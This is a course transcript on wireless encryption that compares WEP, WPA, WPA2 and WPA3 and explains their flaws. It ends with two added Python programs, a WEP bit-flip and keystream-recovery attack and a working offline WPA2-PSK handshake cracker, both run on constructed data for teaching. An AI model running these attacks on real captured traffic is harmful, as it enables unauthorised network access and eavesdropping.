Chapter 11 - 02 - Understand Wireless Network Encryption Mechanisms - 03_ocred_fax_ocred.pdf

Full Transcript


Certified Cybersecurity Technician Exam 212-82 Wireless Network Security

Comparison of WEP, WPA, WPA2, and WPA3

WPA2: Incorporates protection against forgery and replay attacks.
WPA3: Provides enhanced password protection and secured IoT connections; encompasses stronger encryption techniques.

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Comparison of WEP, WPA, WPA2, and WPA3

WEP provides data confidentiality on wireless networks, but it is weak and fails to meet any of its security goals. WPA fixes most of WEP's problems, and WPA2 makes wireless networks almost as secure as wired networks. Because WPA2 supports authentication, only authorized users can access the network. WEP should be replaced with WPA2 (or WPA3 where the hardware supports it) to secure a Wi-Fi network; WPA with TKIP should be regarded only as a stopgap for legacy devices, because of the TKIP weaknesses described later in this section. Although WPA and WPA2 incorporate protection against forgery and replay attacks, WPA3 provides a stronger password-protection mechanism and secure IoT connections, and it uses stronger encryption techniques.

The table below compares WEP, WPA, WPA2, and WPA3 in terms of the encryption algorithm used, the IV size, the encryption-key length, key management, and the data-integrity mechanism.

Encryption | Encryption Algorithm | IV Size                           | Encryption Key Length | Key Management  | Integrity Check Mechanism
WEP        | RC4                  | 24 bits                           | 40/104 bits           | None            | CRC-32
WPA        | RC4, TKIP            | 48 bits                           | 128 bits              | 4-way handshake | Michael algorithm and CRC-32
WPA2       | AES-CCMP             | 48 bits                           | 128 bits              | 4-way handshake | CBC-MAC
WPA3       | AES-GCMP-256         | Arbitrary length (1 to 2^64 bits) | 192 bits              | ECDH and ECDSA  | BIP-GMAC-256

Table 11.2: Comparison of WEP, WPA, WPA2, and WPA3

Module 11 Page 1439

Issues in WEP, WPA, and WPA2

Issues in WEP:
- CRC-32 does not ensure complete cryptographic integrity
- IVs are 24 bits and sent in cleartext
- Vulnerable to known-plaintext attacks
- Prone to password-cracking attacks
- Lack of centralized key management

Issues in WPA:
- Pre-shared key is vulnerable to eavesdropping and dictionary attacks
- Lack of forward secrecy
- WPA-TKIP is vulnerable to packet spoofing and decryption attacks
- Insecure random number generator (RNG) in WPA allows the discovery of the GTK generated by the AP
- Vulnerabilities in TKIP allow attackers to guess the IP address of the subnet

Issues in WPA2:
- Pre-shared key is vulnerable to eavesdropping and dictionary attacks
- Lack of forward secrecy
- Hole196 vulnerability makes WPA2 vulnerable to MITM and DoS attacks
- Insecure random number generator (RNG) in WPA2 allows attackers to discover the GTK generated by the AP
- KRACK vulnerabilities make WPA2 vulnerable to packet sniffing, connection hijacking, malware injection, and decryption attacks

Issues in WEP

WEP encryption is insufficient to secure wireless networks because of the following issues and anomalies.

- CRC-32 is insufficient to ensure the complete cryptographic integrity of a packet: CRC-32 is a linear checksum, not a keyed MAC. An attacker who captures an encrypted packet can flip chosen bits in the ciphertext and apply the matching correction to the encrypted ICV, without knowing the key, so that the modified packet passes the integrity check and is accepted.
- IVs are only 24 bits: The IV is a 24-bit field, which is too small to be secure, and it is sent in the cleartext portion of each frame. An AP that continuously sends 1500-byte packets at 11 Mbps exhausts the entire IV space (2^24 values) in about five hours.
- WEP is vulnerable to known-plaintext attacks: When an IV collision occurs, both packets were encrypted with the same RC4 keystream. XORing the two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts; if one plaintext is known (or can be guessed, as with ARP or DHCP traffic), the keystream for that IV is recovered and the other packet is decrypted directly.
- WEP is vulnerable to dictionary attacks: Because WEP keys are commonly derived from a password, WEP is prone to password-cracking attacks. In addition, the small IV space allows the attacker to build a decryption table of keystreams indexed by IV, which is a dictionary attack on the keystreams rather than on the password.
- WEP is vulnerable to DoS attacks: Association and disassociation (management) frames are not authenticated, so an attacker can forge them.
- An attacker can eventually construct a decryption table of reconstructed keystreams: With approximately 24 GB of space (2^24 IVs x 1500 bytes of keystream each), an attacker can use this table to decrypt WEP packets in real time.
- A lack of centralized key management makes it difficult to change WEP keys regularly.
- The IV is a value used to randomize the keystream, and each packet carries its own IV: The standard allows only a 24-bit field, which is too small to be secure, and the IV is sent in the cleartext portion of the frame. All available IV values can be used up within hours at a busy AP. The IV is part of the RC4 encryption key, which makes WEP vulnerable to an analytical attack that recovers the key after intercepting and analyzing a relatively small amount of traffic. Reusing an IV reproduces an identical keystream, and because the IV space is so small, keystreams repeat within a short time. Furthermore, wireless adapters from the same vendor may all generate the same IV sequence. This enables attackers to determine the keystream and decrypt the ciphertext.
- The standard does not require each packet to have a unique IV: Vendors use only a small part of the available 24-bit possibilities. Consequently, a mechanism that is supposed to depend on randomness is not random at all, and attackers can easily determine the keystream and decrypt other messages.
- RC4 was designed to be used as a one-time cipher; it was never intended to encrypt many messages under keys that differ only in a short, public prefix (the IV), which is exactly how WEP uses it.

Issues in WPA

WPA is an improvement over WEP in many ways because it uses TKIP for data encryption and provides more secure data transfer. However, WPA has many security issues of its own, including the following.

- Weak passwords: If users choose weak passwords, the WPA PSK is vulnerable to various password-cracking attacks.
- Lack of forward secrecy: If an attacker obtains the PSK, they can decrypt all packets encrypted under keys derived from it, past and future, provided they have also captured the 4-way handshake of the session in question.
- Vulnerability to packet spoofing and decryption: Clients using WPA-TKIP are vulnerable to packet-injection and decryption attacks, which further allow attackers to hijack Transmission Control Protocol (TCP) connections.
- Predictability of the group temporal key (GTK): An insecure random number generator (RNG) in WPA allows attackers to discover the GTK generated by the AP. This further allows attackers to inject malicious traffic into the network and decrypt transmissions in progress on the wireless network.
- Guessing of IP addresses: TKIP vulnerabilities allow attackers to guess the IP address of the subnet and inject small packets into the network to degrade network performance.

Issues in WPA2

Although WPA2 is more secure than WPA, it also has some security issues, which are discussed below.

- Weak passwords: If users choose weak passwords, the WPA2 PSK is vulnerable to various attacks such as eavesdropping, dictionary, and password-cracking attacks.
- Lack of forward secrecy: If an attacker obtains the PSK, they can decrypt all packets encrypted under keys derived from it, past and future, provided they have also captured the 4-way handshake of the session in question.
- Vulnerability to man-in-the-middle (MITM) and denial-of-service (DoS) attacks: The Hole196 vulnerability in WPA2 allows an authenticated client (an insider) to exploit the shared group temporal key (GTK), which every client on the network holds, to forge group-addressed frames and perform MITM and DoS attacks against other clients.
- Predictability of GTK: An insecure random number generator (RNG) in WPA2 allows attackers to discover the GTK generated by the AP. This further allows attackers to inject malicious traffic into the network and decrypt transmissions in progress on the wireless network.
- KRACK vulnerabilities: WPA2 has a significant vulnerability to an exploit known as the key reinstallation attack (KRACK), in which a replayed handshake message tricks the client into reinstalling a key that is already in use and resetting its nonce and replay counters. The resulting keystream reuse may allow attackers to sniff packets, hijack connections, inject malware, and decrypt packets.
- Vulnerability to wireless DoS attacks: Attackers can abuse the WPA2 replay-detection mechanism by sending forged group-addressed data frames with a large packet number (PN); once a client's replay counter has been advanced this way, legitimate frames with lower PNs are discarded as replays, producing a DoS.
- Insecure WPS PIN recovery: Recovering a WPA2 PSK directly can be time-consuming, because the attacker must crack the PSK that the clients use. When WPS is enabled alongside WPA2, the attacker can instead recover the WPA2 key by determining the WPS personal identification number (PIN) in a few simple steps: the eight-digit PIN is verified in two halves, so it can be brute-forced online in a matter of hours, and the AP then hands the WPA2 PSK to whoever presents the correct PIN.
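To make the WEP weaknesses above concrete, here is an added example (it is not part of the course text): a minimal WEP-style encryptor (RC4 over IV || key, CRC-32 ICV) alongside two attacks that need no knowledge of the key. The first modifies a captured frame by exploiting the linearity of CRC-32 so that the AP still accepts it; the second uses an IV collision plus one known plaintext to recover the keystream and read a second frame. The key, IV, payloads and the HTTP-like plaintexts are all constructed for the demonstration.

```python
# Added example, not from the EC-Council course text.  Constructed WEP-style
# frames: RC4(IV || key) XOR (plaintext || CRC-32), with the IV sent in clear.
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA), exactly as WEP applies it to IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext (little-endian)."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame = IV (clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    stream = rc4(iv + wep_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), stream)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """What the AP does: decrypt, recompute CRC-32, accept only if it matches."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + wep_key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def bitflip_attack(frame: bytes, delta: bytes) -> bytes:
    """Modify a captured frame without the key.  CRC-32 is affine under XOR:
         crc(p ^ delta) == crc(p) ^ crc(delta) ^ crc(zeros)
    so XOR `delta` into the ciphertext and the matching correction into the
    encrypted ICV; the AP's integrity check then still passes."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    fix = xor(icv(delta), icv(bytes(n)))
    return iv + xor(body[:n], delta) + xor(body[n:], fix)


def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """IV collision: every frame with this IV uses the same RC4 keystream, so one
    known plaintext (plus its ICV, which anyone can compute) reveals it."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    return xor(frame[3:], keystream)[:-4]


def demo() -> dict:
    wep_key = bytes.fromhex("0badc0ffee")   # constructed 40-bit key; the attacker never sees it
    iv = b"\x01\x02\x03"
    original = b"GET /admin HTTP/1.0\r\n"  # constructed plaintext
    frame = wep_encrypt(wep_key, iv, original)

    # (1) Bit-flip: rewrite the request path using only the captured frame and a
    #     guess of the plaintext layout.  Flipping bits without fixing the ICV fails.
    delta = xor(original, b"GET /index HTTP/1.0\r\n")
    naive = frame[:3] + xor(frame[3:-4], delta) + frame[-4:]
    forged = bitflip_attack(frame, delta)

    # (2) IV reuse: a later frame with the same IV carries a secret; knowing
    #     `original`, the attacker recovers the keystream and reads the secret.
    secret = b"password=hunter2\r\n"       # constructed plaintext
    frame2 = wep_encrypt(wep_key, iv, secret)
    stream = keystream_from_known_plaintext(frame, original)

    return {
        "naive_accepted": wep_decrypt(wep_key, naive) is not None,   # False
        "forged_plaintext": wep_decrypt(wep_key, forged),            # b"GET /index HTTP/1.0\r\n"
        "recovered_secret": decrypt_with_keystream(frame2, stream),  # b"password=hunter2\r\n"
    }


if __name__ == "__main__":
    print(demo())
```

The bit-flip works on a single captured frame; no second packet is required. Replacing CRC-32 with a keyed MAC (as WPA's Michael, or CCMP's CBC-MAC, does) removes the attack, because the attacker can no longer predict how the tag changes when the message changes.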
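For the weak-password and forward-secrecy issues listed under both WPA and WPA2, the following added example (not course material) shows why a PSK can be cracked offline from a single captured 4-way handshake, and why the recovered PSK yields the session's traffic key. The derivations follow IEEE 802.11i for WPA2 with AES-CCMP (PBKDF2-HMAC-SHA1 for the PMK, PRF-512 for the PTK, and an HMAC-SHA1 MIC over the EAPOL-Key frame); the SSID, MAC addresses, nonces, EAPOL message 2 and wordlist are constructed stand-ins for what a sniffer would capture.

```python
# Added example, not from the EC-Council course text.  Offline dictionary attack
# on a WPA2-PSK 4-way handshake; all captured values below are constructed.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the only salt, so the attacker computes one PMK per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus values that are public in the handshake: both MAC
    addresses and both nonces.  PTK = KCK (16) || KEK (16) || TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: first 16 bytes of HMAC-SHA1 over the
    EAPOL-Key frame with its MIC field zeroed, keyed with the KCK."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP), MIC field zeroed, no key
    data: 802.1X header, descriptor type 2, key info 0x010a, key length 16,
    replay counter, SNonce, key IV, RSC, reserved, MIC, key data length."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Offline attack: the passphrase is the only unknown in the MIC computation.
    Returns (passphrase, TK) on success; TK is the CCMP key for the session."""
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_zeroed), captured_mic):
            return candidate, ptk[32:48]
    return None, None


def demo():
    ssid = "CorpGuest"                       # constructed
    aa = bytes.fromhex("001122334455")       # AP (authenticator) MAC, constructed
    spa = bytes.fromhex("66778899aabb")      # client (supplicant) MAC, constructed
    anonce = bytes(range(32))                # constructed nonces
    snonce = bytes(range(32, 64))

    # The owner chose a weak passphrase; build what a sniffer sees in message 2.
    ptk_real = derive_ptk(pmk_from_passphrase("summer2019", ssid), aa, spa, anonce, snonce)
    msg2 = build_msg2(snonce)
    captured_mic = eapol_mic(ptk_real[:16], msg2)

    wordlist = ["letmein", "qwerty", "summer2019", "correct horse battery staple"]
    found, tk = crack_psk(ssid, aa, spa, anonce, snonce, msg2, captured_mic, wordlist)
    return found, tk == ptk_real[32:48]      # ("summer2019", True)


if __name__ == "__main__":
    print(demo())
```

Every input to `crack_psk` except the passphrase is transmitted in the clear, which is why the attack runs offline at the full speed of the attacker's hardware. The returned TK is the key that decrypts that session's CCMP traffic, and since the PMK never changes for a given SSID and passphrase, any handshake captured later is broken with no further work: this is the lack of forward secrecy described above. The same computation with a different salt and iteration count applies to WPA-PSK, whose MIC uses HMAC-MD5 and whose TKIP keys are also derived from the PTK.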
